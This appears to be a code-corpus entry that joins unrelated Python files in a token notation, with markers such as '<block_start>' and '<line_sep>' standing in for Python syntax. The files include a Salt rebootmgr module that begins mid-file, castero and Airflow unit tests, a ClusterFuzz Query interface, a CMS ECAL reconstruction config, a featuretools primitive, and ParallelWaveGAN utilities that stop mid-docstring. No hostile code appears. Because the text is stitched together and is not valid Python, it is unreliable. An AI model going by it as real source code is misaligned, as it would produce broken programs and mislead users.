<block_start>"""Check if the rebootmgrd is running and active or not. CLI Example: .. code-block:: bash salt microos rebootmgr is_active """<line_sep>cmd=["rebootmgrctl" "is_active" "--quiet"]<line_sep><return>_cmd(cmd retcode=<true>)<eq>0<block_end><def_stmt>reboot order=<none><block_start>"""Tells rebootmgr to schedule a reboot. With the [now] option, a forced reboot is done, no lock from etcd is requested and a set maintenance window is ignored. With the [fast] option, a lock from etcd is requested if needed, but a defined maintenance window is ignored. order If specified, can be "now" or "fast" CLI Example: .. code-block:: bash salt microos rebootmgr reboot salt microos rebootmgt reboot order=now """<if_stmt>order<and>order<not><in>("now" "fast")<block_start><raise>salt.exceptions.CommandExecutionError("Order parameter, if specified, must be 'now' or 'fast'")<block_end>cmd=["rebootmgrctl" "reboot"]<if_stmt>order<block_start>cmd.append(order)<block_end><return>_cmd(cmd)<block_end><def_stmt>cancel <block_start>"""Cancels an already running reboot. CLI Example: .. code-block:: bash salt microos rebootmgr cancel """<line_sep>cmd=["rebootmgrctl" "cancel"]<line_sep><return>_cmd(cmd)<block_end><def_stmt>status <block_start>"""Returns the current status of rebootmgrd. Valid returned values are: 0 - No reboot requested 1 - Reboot requested 2 - Reboot requested, waiting for maintenance window 3 - Reboot requested, waiting for etcd lock. CLI Example: .. code-block:: bash salt microos rebootmgr status """<line_sep>cmd=["rebootmgrctl" "status" "--quiet"]<line_sep><return>_cmd(cmd retcode=<true>)<block_end><def_stmt>set_strategy strategy=<none><block_start>"""A new strategy to reboot the machine is set and written into /etc/rebootmgr.conf. strategy If specified, must be one of those options: best-effort - This is the default strategy. If etcd is running, etcd-lock is used. If no etcd is running, but a maintenance window is specified, the strategy will be maint-window. If no maintenance window is specified, the machine is immediately rebooted (instantly). etcd-lock - A lock at etcd for the specified lock-group will be acquired before reboot. If a maintenance window is specified, the lock is only acquired during this window. maint-window - Reboot does happen only during a specified maintenance window. If no window is specified, the instantly strategy is followed. 
instantly - Other services will be informed that a reboot will happen. Reboot will be done without getting any locks or waiting for a maintenance window. off - Reboot requests are temporary ignored. /etc/rebootmgr.conf is not modified. CLI Example: .. code-block:: bash salt microos rebootmgr set_strategy stragegy=off """<if_stmt>strategy<and>strategy<not><in>("best-effort" "etcd-lock" "maint-window" "instantly" "off" )<block_start><raise>salt.exceptions.CommandExecutionError("Strategy parameter not valid")<block_end>cmd=["rebootmgrctl" "set-strategy"]<if_stmt>strategy<block_start>cmd.append(strategy)<block_end><return>_cmd(cmd)<block_end><def_stmt>get_strategy <block_start>"""The currently used reboot strategy of rebootmgrd will be printed. CLI Example: .. code-block:: bash salt microos rebootmgr get_strategy """<line_sep>cmd=["rebootmgrctl" "get-strategy"]<line_sep><return>_cmd(cmd).split(":")[-1].strip()<block_end><def_stmt>set_window time duration<block_start>"""Set's the maintenance window. time The format of time is the same as described in systemd.time(7). duration The format of duration is "[XXh][YYm]". CLI Example: .. code-block:: bash salt microos rebootmgr set_window time="Thu,Fri 2020-*-1,5 11:12:13" duration=1h """<line_sep>cmd=["rebootmgrctl" "set-window" time duration]<line_sep><return>_cmd(cmd)<block_end><def_stmt>get_window <block_start>"""The currently set maintenance window will be printed. CLI Example: .. code-block:: bash salt microos rebootmgr get_window """<line_sep>cmd=["rebootmgrctl" "get-window"]<line_sep>window=_cmd(cmd)<line_sep><return>dict(zip(("time" "duration") re.search(r"Maintenance window is set to (.*), lasting (.*)." window).groups() ))<block_end><def_stmt>set_group group<block_start>"""Set the group, to which this machine belongs to get a reboot lock from etcd. group Group name CLI Example: .. code-block:: bash salt microos rebootmgr set_group group=group_1 """<line_sep>cmd=["rebootmgrctl" "set-group" group]<line_sep><return>_cmd(cmd)<block_end><def_stmt>get_group <block_start>"""The currently set lock group for etcd. CLI Example: .. code-block:: bash salt microos rebootmgr get_group """<line_sep>cmd=["rebootmgrctl" "get-group"]<line_sep>group=_cmd(cmd)<line_sep><return>re.search(r"Etcd lock group is set to (.*)" group).groups()[0]<block_end><def_stmt>set_max max_locks group=<none><block_start>"""Set the maximal number of hosts in a group, which are allowed to reboot at the same time. number Maximal number of hosts in a group group Group name CLI Example: .. code-block:: bash salt microos rebootmgr set_max 4 """<line_sep>cmd=["rebootmgrctl" "set-max"]<if_stmt>group<block_start>cmd.extend(["--group" group])<block_end>cmd.append(max_locks)<line_sep><return>_cmd(cmd)<block_end><def_stmt>lock machine_id=<none> group=<none><block_start>"""Lock a machine. If no group is specified, the local default group will be used. If no machine-id is specified, the local machine will be locked. machine_id The machine-id is a network wide, unique ID. Per default the ID from /etc/machine-id is used. group Group name CLI Example: .. code-block:: bash salt microos rebootmgr lock group=group1 """<line_sep>cmd=["rebootmgrctl" "lock"]<if_stmt>group<block_start>cmd.extend(["--group" group])<block_end><if_stmt>machine_id<block_start>cmd.append(machine_id)<block_end><return>_cmd(cmd)<block_end><def_stmt>unlock machine_id=<none> group=<none><block_start>"""Unlock a machine. If no group is specified, the local default group will be used. 
If no machine-id is specified, the local machine will be unlocked. machine_id The machine-id is a network wide, unique ID. Per default the ID from /etc/machine-id is used. group Group name CLI Example: .. code-block:: bash salt microos rebootmgr unlock group=group1 """<line_sep>cmd=["rebootmgrctl" "unlock"]<if_stmt>group<block_start>cmd.extend(["--group" group])<block_end><if_stmt>machine_id<block_start>cmd.append(machine_id)<block_end><return>_cmd(cmd)<block_end>
<import_stmt>os<import_from_stmt>unittest mock<import_from_stmt>castero.config Config<import_from_stmt>castero.episode Episode<import_from_stmt>castero.feed Feed<import_from_stmt>castero.player Player<import_from_stmt>castero.queue Queue<line_sep>my_dir=os.path.dirname(os.path.realpath(__file__))<line_sep>feed=Feed(file=my_dir+"/feeds/valid_basic.xml")<line_sep>episode=Episode(feed title="episode title" description="episode description" link="episode link" pubdate="episode pubdate" copyright="episode copyright" enclosure="episode enclosure" )<line_sep>player1=Player("MLK Dream" my_dir+"/media/MLK_Dream_10s.mp3" episode)<line_sep>player2=Player("MLK Dream" my_dir+"/media/MLK_Dream_10s.mp3" episode)<line_sep>player3=Player("MLK Dream" my_dir+"/media/MLK_Dream_10s.mp3" episode)<line_sep>queue=Queue(mock.MagicMock())<line_sep>queue.add(player1)<line_sep>queue.add(player2)<def_stmt>get_queue_perspective display<block_start>"""Retrieve the Queue perspective. :param display the display containing the loaded perspective :returns Queue: the loaded Queue perspective """<line_sep>display._active_perspective=2<line_sep><return>display.perspectives[2]<block_end><def_stmt>test_perspective_queue_borders display<block_start>perspective=get_queue_perspective(display)<line_sep>display.display()<assert_stmt>perspective._queue_window.hline.call_count<eq>1<assert_stmt>perspective._queue_window.vline.call_count<eq>1<assert_stmt>perspective._metadata_window.hline.call_count<eq>1<line_sep>display._stdscr.reset_mock()<block_end><def_stmt>test_perspective_queue_display_episode_metadata display<block_start>perspective=get_queue_perspective(display)<line_sep>display._queue=queue<line_sep>perspective._draw_metadata=mock.MagicMock()<line_sep>display.display()<line_sep>perspective._draw_metadata.assert_called_with(perspective._metadata_window)<line_sep>display._stdscr.reset_mock()<block_end><def_stmt>test_perspective_queue_input_keys display<block_start>perspective=get_queue_perspective(display)<line_sep>display._queue=queue<line_sep>display._footer_window.getch=mock.MagicMock(return_value=10)<line_sep>ret_val=perspective.handle_input(ord("h"))<assert_stmt>ret_val<line_sep>display._stdscr.reset_mock()<line_sep>movement_keys=[display.KEY_MAPPING[Config["key_up"]] display.KEY_MAPPING[Config["key_right"]] display.KEY_MAPPING[Config["key_down"]] display.KEY_MAPPING[Config["key_left"]] display.KEY_MAPPING[Config["key_scroll_up"]] display.KEY_MAPPING[Config["key_scroll_down"]] ]<for_stmt>key movement_keys<block_start>perspective._metadata_updated=<true><line_sep>ret_val=perspective.handle_input(key)<assert_stmt>ret_val<assert_stmt><not>perspective._metadata_updated<block_end>operation_keys=[display.KEY_MAPPING[Config["key_delete"]] display.KEY_MAPPING[Config["key_remove"]] display.KEY_MAPPING[Config["key_reload"]] display.KEY_MAPPING[Config["key_reload_selected"]] display.KEY_MAPPING[Config["key_play_selected"]] display.KEY_MAPPING[Config["key_add_selected"]] display.KEY_MAPPING[Config["key_clear"]] display.KEY_MAPPING[Config["key_next"]] display.KEY_MAPPING[Config["key_pause_play"]] display.KEY_MAPPING[Config["key_pause_play_alt"]] display.KEY_MAPPING[Config["key_seek_forward"]] display.KEY_MAPPING[Config["key_seek_forward_alt"]] display.KEY_MAPPING[Config["key_seek_backward"]] display.KEY_MAPPING[Config["key_seek_backward_alt"]] display.KEY_MAPPING[Config["key_execute"]] ]<for_stmt>key 
operation_keys<block_start>ret_val=perspective.handle_input(key)<assert_stmt>ret_val<block_end>ret_val=perspective.handle_input(ord("q"))<assert_stmt><not>ret_val<line_sep>display._stdscr.reset_mock()<block_end><def_stmt>test_perspective_queue_draw_metadata display<block_start>perspective=get_queue_perspective(display)<line_sep>display.database.replace_feed(feed)<line_sep>display.database.replace_episodes(feed [episode])<line_sep>display.menus_valid=<false><line_sep>perspective._draw_metadata(perspective._metadata_window)<line_sep>perspective._draw_metadata(perspective._metadata_window)<block_end><def_stmt>test_perspective_queue_get_active_menu display<block_start>perspective=get_queue_perspective(display)<line_sep>perspective._active_window=0<assert_stmt>perspective._get_active_menu()<eq>perspective._queue_menu<block_end><def_stmt>test_perspective_queue_remove_selected_first display<block_start>perspective=get_queue_perspective(display)<line_sep>perspective._queue_menu=mock.MagicMock()<line_sep>perspective._queue_menu.item=player1<line_sep>queue1=Queue(display)<line_sep>queue1.add(player1)<line_sep>queue1.add(player2)<line_sep>queue1.add(player3)<line_sep>display._queue=queue1<line_sep>perspective._remove_selected_from_queue()<assert_stmt>queue1.first<eq>player2<assert_stmt>queue1.length<eq>2<block_end><def_stmt>test_perspective_queue_remove_selected_middle display<block_start>perspective=get_queue_perspective(display)<line_sep>perspective._queue_menu=mock.MagicMock()<line_sep>perspective._queue_menu.item=player2<line_sep>queue1=Queue(display)<line_sep>queue1.add(player1)<line_sep>queue1.add(player2)<line_sep>queue1.add(player3)<line_sep>display._queue=queue1<line_sep>perspective._remove_selected_from_queue()<assert_stmt>queue1.first<eq>player1<assert_stmt>queue1.length<eq>2<block_end>
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Represent the interface for Query. This is important because our access control logic needs a unified way to specify conditions for both BigQuery query and Datastore query. This must be compatible with libs.filters and libs.crash_access."""<class_stmt>Query(object)<block_start>"""Represent the interface for Query."""<def_stmt>filter self field value operator='='<block_start>"""Filter by a single value."""<line_sep><raise>NotImplementedError<block_end><def_stmt>filter_in self field values<block_start>"""Filter by multiple values."""<line_sep><raise>NotImplementedError<block_end><def_stmt>union self *queries<block_start>"""Union all queries with OR conditions."""<line_sep><raise>NotImplementedError<block_end><def_stmt>new_subquery self<block_start>"""Instantiate a query that is compatible with the current query."""<line_sep><raise>NotImplementedError<block_end><block_end>
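# --- Illustrative sketch (editor's addition, not part of the original module) ---
# The interface above is deliberately backend-agnostic: concrete subclasses are expected
# to translate filter()/filter_in()/union() into BigQuery or Datastore conditions. The toy
# subclass below only records the conditions it receives, to show the expected call
# pattern; it is not the project's real implementation.
class RecordingQuery(Query):
  """Toy Query that accumulates conditions as plain tuples."""

  def __init__(self):
    self.conditions = []

  def filter(self, field, value, operator='='):
    self.conditions.append(('filter', field, operator, value))

  def filter_in(self, field, values):
    self.conditions.append(('filter_in', field, list(values)))

  def union(self, *queries):
    self.conditions.append(('union', [q.conditions for q in queries]))

  def new_subquery(self):
    return RecordingQuery()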
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. <import_stmt>os<import_from_stmt>unittest mock<import_from_stmt>airflow.providers.google.cloud.transfers.gdrive_to_gcs GoogleDriveToGCSOperator<line_sep>FOLDER_ID=os.environ.get("GCP_GDRIVE_FOLDER_ID" "abcd1234")<line_sep>DRIVE_ID=os.environ.get("GCP_GDRIVE_DRIVE_ID" "abcd1234")<line_sep>FILE_NAME=os.environ.get("GCP_GDRIVE_TO_GCS_FILE_NAME" "gdrive_to_gcs_file.txt")<line_sep>BUCKET=os.environ.get("GCP_GDRIVE_TO_GCS_BUCKET" "gdrive-to-gcs-bucket")<line_sep>OBJECT="prefix/test.txt"<line_sep>GCP_CONN_ID="google_cloud_default"<line_sep>IMPERSONATION_CHAIN=["ACCOUNT_1" "ACCOUNT_2" "ACCOUNT_3"]<class_stmt>TestGoogleDriveToGCSOperator<block_start>@mock.patch("airflow.providers.google.cloud.transfers.gdrive_to_gcs.GCSHook")@mock.patch("airflow.providers.google.cloud.transfers.gdrive_to_gcs.GoogleDriveHook")<def_stmt>test_execute self mock_gdrive_hook mock_gcs_hook<block_start>context={}<line_sep>op=GoogleDriveToGCSOperator(task_id="test_task" folder_id=FOLDER_ID file_name=FILE_NAME drive_id=DRIVE_ID bucket_name=BUCKET object_name=OBJECT gcp_conn_id=GCP_CONN_ID impersonation_chain=IMPERSONATION_CHAIN )<line_sep>meta={"id":"123xyz"}<line_sep>mock_gdrive_hook.return_value.get_file_id.return_value=meta<line_sep>op.execute(context)<line_sep>mock_gdrive_hook.return_value.get_file_id.assert_called_once_with(folder_id=FOLDER_ID file_name=FILE_NAME drive_id=DRIVE_ID)<line_sep>mock_gdrive_hook.return_value.download_file.assert_called_once_with(file_id=meta["id"] file_handle=mock.ANY)<line_sep>mock_gcs_hook.return_value.provide_file_and_upload.assert_called_once_with(bucket_name=BUCKET object_name=OBJECT)<assert_stmt>op.dry_run()<is><none><block_end><block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("RECO2")<line_sep>process.load('Configuration.StandardSequences.Services_cff')<line_sep>process.load('FWCore.MessageService.MessageLogger_cfi')<line_sep>process.load('Configuration.EventContent.EventContent_cff')<line_sep>process.load('Configuration.StandardSequences.GeometryRecoDB_cff')<line_sep>process.load('Configuration.Geometry.GeometrySimDB_cff')<line_sep>process.load('Configuration.StandardSequences.MagneticField_cff')<line_sep>process.load('Configuration.StandardSequences.EndOfProcess_cff')<line_sep>process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")<line_sep>process.load('Configuration.StandardSequences.RawToDigi_cff')<line_sep>process.load('Configuration.StandardSequences.Reconstruction_cff')<line_sep>process.GlobalTag.globaltag='GR_R_74_V10A'<line_sep>process.GlobalTag.toGet=cms.VPSet(cms.PSet(record=cms.string("GeometryFileRcd") tag=cms.string("XMLFILE_Geometry_2015_72YV2_Extended2015ZeroMaterial_mc") connect=cms.untracked.string("frontier://FrontierProd/CMS_COND_GEOMETRY_000") # label = cms.untracked.string("Extended2015ZeroMaterial") ) cms.PSet(record=cms.string("EcalTBWeightsRcd") tag=cms.string("EcalTBWeights_3p5_time_mc") connect=cms.untracked.string("frontier://FrontierPrep/CMS_COND_ECAL")))<line_sep>#### CONFIGURE IT HERE isMC=<true><line_sep>##################### process.MessageLogger.cerr.FwkReport.reportEvery=1<line_sep># start from RAW format for more flexibility process.raw2digi_step=cms.Sequence(process.RawToDigi)<line_sep># get uncalibrechits with global method / time from ratio <import_stmt>RecoLocalCalo.EcalRecProducers.ecalGlobalUncalibRecHit_cfi<line_sep>process.ecalGlobalUncalibRecHit=RecoLocalCalo.EcalRecProducers.ecalGlobalUncalibRecHit_cfi.ecalGlobalUncalibRecHit.clone()<line_sep># get uncalib rechits from multifit method / time from ratio <import_stmt>RecoLocalCalo.EcalRecProducers.ecalMultiFitUncalibRecHit_cfi<line_sep>process.ecalMultiFitUncalibRecHit=RecoLocalCalo.EcalRecProducers.ecalMultiFitUncalibRecHit_cfi.ecalMultiFitUncalibRecHit.clone()<line_sep>process.ecalMultiFitUncalibRecHit.algoPSet.activeBXs=cms.vint32(-5 -4 -3 -2 -1 0 1 2 3 4)<line_sep>process.ecalMultiFitUncalibRecHit.algoPSet.useLumiInfoRunHeader=cms.bool(<false>)<line_sep># get uncalib rechits from multifit method / time from weights process.ecalMultiFit2UncalibRecHit=RecoLocalCalo.EcalRecProducers.ecalMultiFitUncalibRecHit_cfi.ecalMultiFitUncalibRecHit.clone()<line_sep>process.ecalMultiFit2UncalibRecHit.algoPSet.timealgo=cms.string("WeightsMethod")<line_sep>process.ecalMultiFit2UncalibRecHit.algoPSet.activeBXs=cms.vint32(-5 -4 -3 -2 -1 0 1 2 3 4)<line_sep>process.ecalMultiFit2UncalibRecHit.algoPSet.useLumiInfoRunHeader=cms.bool(<false>)<line_sep># get the recovered digis 
<if_stmt>isMC<block_start>process.ecalDetIdToBeRecovered.ebSrFlagCollection='simEcalDigis:ebSrFlags'<line_sep>process.ecalDetIdToBeRecovered.eeSrFlagCollection='simEcalDigis:eeSrFlags'<line_sep>process.ecalRecHit.recoverEBFE=<false><line_sep>process.ecalRecHit.recoverEEFE=<false><line_sep>process.ecalRecHit.killDeadChannels=<false><line_sep>process.ecalRecHit.ebDetIdToBeRecovered=''<line_sep>process.ecalRecHit.eeDetIdToBeRecovered=''<line_sep>process.ecalRecHit.ebFEToBeRecovered=''<line_sep>process.ecalRecHit.eeFEToBeRecovered=''<block_end>process.ecalRecHitGlobal=process.ecalRecHit.clone()<line_sep>process.ecalRecHitGlobal.EBuncalibRecHitCollection='ecalGlobalUncalibRecHit:EcalUncalibRecHitsEB'<line_sep>process.ecalRecHitGlobal.EEuncalibRecHitCollection='ecalGlobalUncalibRecHit:EcalUncalibRecHitsEE'<line_sep>process.ecalRecHitGlobal.EBrechitCollection='EcalRecHitsGlobalEB'<line_sep>process.ecalRecHitGlobal.EErechitCollection='EcalRecHitsGlobalEE'<line_sep>process.ecalRecHitMultiFit=process.ecalRecHit.clone()<line_sep>process.ecalRecHitMultiFit.EBuncalibRecHitCollection='ecalMultiFitUncalibRecHit:EcalUncalibRecHitsEB'<line_sep>process.ecalRecHitMultiFit.EEuncalibRecHitCollection='ecalMultiFitUncalibRecHit:EcalUncalibRecHitsEE'<line_sep>process.ecalRecHitMultiFit.EBrechitCollection='EcalRecHitsMultiFitEB'<line_sep>process.ecalRecHitMultiFit.EErechitCollection='EcalRecHitsMultiFitEE'<line_sep>process.ecalRecHitMultiFit2=process.ecalRecHit.clone()<line_sep>process.ecalRecHitMultiFit2.EBuncalibRecHitCollection='ecalMultiFit2UncalibRecHit:EcalUncalibRecHitsEB'<line_sep>process.ecalRecHitMultiFit2.EEuncalibRecHitCollection='ecalMultiFit2UncalibRecHit:EcalUncalibRecHitsEE'<line_sep>process.ecalRecHitMultiFit2.EBrechitCollection='EcalRecHitsMultiFit2EB'<line_sep>process.ecalRecHitMultiFit2.EErechitCollection='EcalRecHitsMultiFit2EE'<line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(1000))<line_sep>path='/store/data/Run2012D/DoubleElectron/RAW-RECO/ZElectron-22Jan2013-v1/10000/'<line_sep>process.source=cms.Source("PoolSource" duplicateCheckMode=cms.untracked.string("noDuplicateCheck") fileNames=cms.untracked.vstring(path+'0008202C-E78F-E211-AADB-0026189437FD.root'))<line_sep>process.out=cms.OutputModule("PoolOutputModule" outputCommands=cms.untracked.vstring('drop *' 'keep *_ecalUncalib*_*_RECO2' 'keep *_ecalRecHit*_*_RECO2' 'keep *_offlineBeamSpot_*_*' 'keep *_addPileupInfo_*_*') fileName=cms.untracked.string('reco2_pu40.root'))<line_sep>process.ecalAmplitudeReco=cms.Sequence(process.ecalGlobalUncalibRecHit<times>process.ecalMultiFitUncalibRecHit<times>process.ecalMultiFit2UncalibRecHit)<line_sep>process.ecalRecHitsReco=cms.Sequence(process.ecalRecHitGlobal<times>process.ecalRecHitMultiFit<times>process.ecalRecHitMultiFit2)<line_sep>process.ecalTestRecoLocal=cms.Sequence(process.raw2digi_step<times>process.ecalAmplitudeReco<times>process.ecalRecHitsReco)<import_from_stmt>PhysicsTools.PatAlgos.tools.helpers *<line_sep>process.p=cms.Path(process.ecalTestRecoLocal)<line_sep>process.outpath=cms.EndPath(process.out)<line_sep>######################### # Time Profiling # ######################### #https://twiki.cern.ch/twiki/bin/viewauth/CMS/FastTimerService process.MessageLogger.cerr.FastReport=cms.untracked.PSet(limit=cms.untracked.int32(10000000))<line_sep># remove any instance of the FastTimerService <if_stmt>'FastTimerService'<in>process.__dict__<block_start><del_stmt>process.FastTimerService<block_end># instrument the menu with the FastTimerService 
process.load("HLTrigger.Timer.FastTimerService_cfi")<line_sep># print a text summary at the end of the job process.FastTimerService.printJobSummary=<true><line_sep># enable per-event DQM plots process.FastTimerService.enableDQM=<true><line_sep># enable per-module DQM plots process.FastTimerService.enableDQMbyModule=<true><line_sep># enable per-event DQM plots by lumisection process.FastTimerService.enableDQMbyLumiSection=<true><line_sep>process.FastTimerService.dqmLumiSectionsRange=2500# lumisections (23.31 s) # set the time resolution of the DQM plots process.FastTimerService.dqmTimeRange=1000.# ms process.FastTimerService.dqmTimeResolution=5.# ms process.FastTimerService.dqmPathTimeRange=100.# ms process.FastTimerService.dqmPathTimeResolution=0.5# ms process.FastTimerService.dqmModuleTimeRange=1000.# ms process.FastTimerService.dqmModuleTimeResolution=0.5# ms # set the base DQM folder for the plots process.FastTimerService.dqmPath="HLT/TimerService"<line_sep>process.FastTimerService.enableDQMbyProcesses=<true><line_sep># save the DQM plots in the DQMIO format process.dqmOutput=cms.OutputModule("DQMRootOutputModule" fileName=cms.untracked.string("DQM_pu40.root"))<line_sep>process.FastTimerOutput=cms.EndPath(process.dqmOutput)<line_sep>
<import_from_stmt>woodwork.column_schema ColumnSchema<import_from_stmt>featuretools.primitives.base AggregationPrimitive<class_stmt>CustomMean(AggregationPrimitive)<block_start>name="custom_mean"<line_sep>input_types=[ColumnSchema(semantic_tags={"numeric"})]<line_sep>return_type=ColumnSchema(semantic_tags={"numeric"})<block_end>
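# A minimal sketch of how an aggregation primitive such as CustomMean above is
# usually completed and exercised; the get_function body and the commented dfs
# call are illustrative assumptions, not taken from this entry.
import numpy as np
import featuretools as ft

class CustomMeanRunnable(CustomMean):
    def get_function(self):
        # the callable applied to the numeric input column of each group
        return np.mean

# feature_matrix, feature_defs = ft.dfs(
#     entityset=es,                       # hypothetical EntitySet
#     target_dataframe_name="customers",  # hypothetical target dataframe
#     agg_primitives=[CustomMeanRunnable],
# )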
# -*- coding: utf-8 -*- # Copyright 2019 <NAME> # MIT License (https://opensource.org/licenses/MIT) """Utility functions."""<import_stmt>fnmatch<import_stmt>logging<import_stmt>os<import_stmt>sys<import_stmt>tarfile<import_from_stmt>distutils.version LooseVersion<import_from_stmt>filelock FileLock<import_stmt>h5py<import_stmt>numpy<as>np<import_stmt>torch<import_stmt>yaml<line_sep>PRETRAINED_MODEL_LIST={"ljspeech_parallel_wavegan.v1":"1PdZv37JhAQH6AwNh31QlqruqrvjTBq7U" "ljspeech_parallel_wavegan.v1.long":"1A9TsrD9fHxFviJVFjCk5W6lkzWXwhftv" "ljspeech_parallel_wavegan.v1.no_limit":"1CdWKSiKoFNPZyF1lo7Dsj6cPKmfLJe72" "ljspeech_parallel_wavegan.v3":"1-oZpwpWZMMolDYsCqeL12dFkXSBD9VBq" "ljspeech_melgan.v1":"1i7-FPf9LPsYLHM6yNPoJdw5Q9d28C-ip" "ljspeech_melgan.v1.long":"1x1b_R7d2561nqweK3FPb2muTdcFIYTu6" "ljspeech_melgan.v3":"1J5gJ_FUZhOAKiRFWiAK6FcO5Z6oYJbmQ" "ljspeech_melgan.v3.long":"124JnaLcRe7TsuAGh3XIClS3C7Wom9AU2" "ljspeech_full_band_melgan.v2":"1Kb7q5zBeQ30Wsnma0X23G08zvgDG5oen" "ljspeech_multi_band_melgan.v2":"1b70pJefKI8DhGYz4SxbEHpxm92tj1_qC" "ljspeech_hifigan.v1":"1i6-hR_ksEssCYNlNII86v3AoeA1JcuWD" "ljspeech_style_melgan.v1":"10aJSZfmCAobQJgRGio6cNyw6Xlgmme9-" "jsut_parallel_wavegan.v1":"1qok91A6wuubuz4be-P9R2zKhNmQXG0VQ" "jsut_multi_band_melgan.v2":"1chTt-76q2p69WPpZ1t1tt8szcM96IKad" "jsut_hifigan.v1":"1vdgqTu9YKyGMCn-G7H2fI6UBC_4_55XB" "jsut_style_melgan.v1":"1VIkjSxYxAGUVEvJxNLaOaJ7Twe48SH-s" "csmsc_parallel_wavegan.v1":"1QTOAokhD5dtRnqlMPTXTW91-CG7jf74e" "csmsc_multi_band_melgan.v2":"1G6trTmt0Szq-jWv2QDhqglMdWqQxiXQT" "csmsc_hifigan.v1":"1fVKGEUrdhGjIilc21Sf0jODulAq6D1qY" "csmsc_style_melgan.v1":"1kGUC_b9oVSv24vZRi66AAbSNUKJmbSCX" "arctic_slt_parallel_wavegan.v1":"1_MXePg40-7DTjD0CDVzyduwQuW_O9aA1" "jnas_parallel_wavegan.v1":"1D2TgvO206ixdLI90IqG787V6ySoXLsV_" "vctk_parallel_wavegan.v1":"1bqEFLgAroDcgUy5ZFP4g2O2MwcwWLEca" "vctk_parallel_wavegan.v1.long":"1tO4-mFrZ3aVYotgg7M519oobYkD4O_0-" "vctk_multi_band_melgan.v2":"10PRQpHMFPE7RjF-MHYqvupK9S0xwBlJ_" "vctk_hifigan.v1":"1oVOC4Vf0DYLdDp4r7GChfgj7Xh5xd0ex" "vctk_style_melgan.v1":"14ThSEgjvl_iuFMdEGuNp7d3DulJHS9Mk" "libritts_parallel_wavegan.v1":"1zHQl8kUYEuZ_i1qEFU6g2MEu99k3sHmR" "libritts_parallel_wavegan.v1.long":"1b9zyBYGCCaJu0TIus5GXoMF8M3YEbqOw" "libritts_multi_band_melgan.v2":"1kIDSBjrQvAsRewHPiFwBZ3FDelTWMp64" "libritts_hifigan.v1":"1_TVFIvVtMn-Z4NiQrtrS20uSJOvBsnu1" "libritts_style_melgan.v1":"1yuQakiMP0ECdB55IoxEGCbXDnNkWCoBg" "kss_parallel_wavegan.v1":"1mLtQAzZHLiGSWguKCGG0EZa4C_xUO5gX" "hui_acg_hokuspokus_parallel_wavegan.v1":"1irKf3okMLau56WNeOnhr2ZfSVESyQCGS" "ruslan_parallel_wavegan.v1":"1M3UM6HN6wrfSe5jdgXwBnAIl_lJzLzuI" }<def_stmt>find_files root_dir query="*.wav" include_root_dir=<true><block_start>"""Find files recursively. Args: root_dir (str): Root root_dir to find. query (str): Query to find. include_root_dir (bool): If False, root_dir name is not included. Returns: list: List of found filenames. """<line_sep>files=[]<for_stmt>root,dirnames,filenames os.walk(root_dir followlinks=<true>)<block_start><for_stmt>filename fnmatch.filter(filenames query)<block_start>files.append(os.path.join(root filename))<block_end><block_end><if_stmt><not>include_root_dir<block_start>files=[file_.replace(root_dir+"/" "")<for>file_ files]<block_end><return>files<block_end><def_stmt>read_hdf5 hdf5_name hdf5_path<block_start>"""Read hdf5 dataset. Args: hdf5_name (str): Filename of hdf5 file. hdf5_path (str): Dataset name in hdf5 file. Return: any: Dataset values. 
"""<if_stmt><not>os.path.exists(hdf5_name)<block_start>logging.error(f"There is no such a hdf5 file ({hdf5_name}).")<line_sep>sys.exit(1)<block_end>hdf5_file=h5py.File(hdf5_name "r")<if_stmt>hdf5_path<not><in>hdf5_file<block_start>logging.error(f"There is no such a data in hdf5 file. ({hdf5_path})")<line_sep>sys.exit(1)<block_end>hdf5_data=hdf5_file[hdf5_path][()]<line_sep>hdf5_file.close()<line_sep><return>hdf5_data<block_end><def_stmt>write_hdf5 hdf5_name hdf5_path write_data is_overwrite=<true><block_start>"""Write dataset to hdf5. Args: hdf5_name (str): Hdf5 dataset filename. hdf5_path (str): Dataset path in hdf5. write_data (ndarray): Data to write. is_overwrite (bool): Whether to overwrite dataset. """<line_sep># convert to numpy array write_data=np.array(write_data)<line_sep># check folder existence folder_name,_=os.path.split(hdf5_name)<if_stmt><not>os.path.exists(folder_name)<and>len(folder_name)<ne>0<block_start>os.makedirs(folder_name)<block_end># check hdf5 existence <if_stmt>os.path.exists(hdf5_name)# if already exists, open with r+ mode <block_start>hdf5_file=h5py.File(hdf5_name "r+")<line_sep># check dataset existence <if_stmt>hdf5_path<in>hdf5_file<block_start><if_stmt>is_overwrite<block_start>logging.warning("Dataset in hdf5 file already exists. "<concat>"recreate dataset in hdf5.")<line_sep>hdf5_file.__delitem__(hdf5_path)<block_end><else_stmt><block_start>logging.error("Dataset in hdf5 file already exists. "<concat>"if you want to overwrite, please set is_overwrite = True.")<line_sep>hdf5_file.close()<line_sep>sys.exit(1)<block_end><block_end><block_end><else_stmt># if not exists, open with w mode <block_start>hdf5_file=h5py.File(hdf5_name "w")<block_end># write data to hdf5 hdf5_file.create_dataset(hdf5_path data=write_data)<line_sep>hdf5_file.flush()<line_sep>hdf5_file.close()<block_end><class_stmt>HDF5ScpLoader(object)<block_start>"""Loader class for a fests.scp file of hdf5 file. Examples: key1 /some/path/a.h5:feats key2 /some/path/b.h5:feats key3 /some/path/c.h5:feats key4 /some/path/d.h5:feats ... >>> loader = HDF5ScpLoader("hdf5.scp") >>> array = loader["key1"] key1 /some/path/a.h5 key2 /some/path/b.h5 key3 /some/path/c.h5 key4 /some/path/d.h5 ... >>> loader = HDF5ScpLoader("hdf5.scp", "feats") >>> array = 